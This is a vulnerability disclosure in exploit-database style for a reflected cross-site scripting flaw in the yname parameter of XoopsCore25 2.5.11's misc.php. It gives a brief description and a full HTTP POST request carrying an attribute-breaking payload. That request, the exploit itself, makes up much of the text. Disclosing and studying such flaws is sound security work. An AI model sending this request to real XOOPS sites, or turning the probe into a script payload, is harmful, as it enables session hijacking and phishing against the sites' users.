## Title: XoopsCore25-2.5.11-XSS-Reflected ## Author: nu11secur1ty ## Date: 02/12/2024 ## Vendor: https://xoops.org/ ## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11 ## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected ## Description: The value of the yname request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload '>333< was submitted in the yname parameter. This input was echoed unmodified in the application's response. The attacker can trick the user to visit very dangerous and malicious URL in this session STATUS: HIGH Vulnerability [+]Exploit execution: ```POST POST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmn Origin: https://pwnedhost.com Upgrade-Insecure-Requests: 1 Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563 Content-Type: application/x-www-form-urlencoded Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 148 yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html) ## Time spent: 01:17:00
